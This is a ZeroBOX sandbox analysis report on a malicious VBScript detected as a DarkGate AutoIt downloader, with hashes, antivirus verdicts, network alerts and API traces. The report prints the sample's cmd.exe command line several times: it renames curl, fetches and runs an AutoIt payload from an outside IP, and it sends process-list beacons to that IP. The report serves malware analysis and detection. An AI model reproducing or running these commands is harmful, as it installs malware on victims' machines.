Summary | ZeroBOX

neverban_FFNTdW.vbs

[C] All Process AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 26, 2023, 6:06 p.m. Sept. 26, 2023, 6:08 p.m.
Size 1.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 1769260da8b9bd86d94598a926e93bb5
SHA256 94deee831f93c644bb2a4b1e3ac316d2f41f7d1a9f836dd77ff33312cd6cda6a
CRC32 EE999FB4
ssdeep 48:PnCFDHVxaMf4u0lWr0plSAS8ws6CTAakeyrjoZE8:/8a0NAH68AvOE8
Yara
  • VBScript_Check_All_Process - VBScript Check All Process

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
66.42.63.27 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 66.42.63.27:2351 -> 192.168.56.101:49161 2048098 ET MALWARE DarkGate AutoIt Downloader A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'eyzq' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'eyzq' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'Autoit3.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
wmi Select * from Win32_Process
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
filepath: cmd
1 1 0
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.VBS.SAgent.gen
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
AVG Script:SNH-gen [Trj]
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
cmdline cmd /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
host 66.42.63.27
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /eyzqxxxk HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exesrvany.exeKMService.execonhost.exetaskhost.exesppsvc.exesvchost.exedwm.exeexplorer.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exepw.exetaskhost.exewsqmcons.exesdclt.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351
socket: 604
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /eyzqxxxk HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exesrvany.exeKMService.execonhost.exetaskhost.exesppsvc.exesvchost.exedwm.exeexplorer.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exepw.exetaskhost.exewsqmcons.exesdclt.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351
socket: 604
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
parent_process wscript.exe martian_process cmd /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
Process injection Process 2556 resumed a thread in remote process 2748
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000388
suspend_count: 1
process_identifier: 2748
1 0 0
file C:\Windows\System32\cmd.exe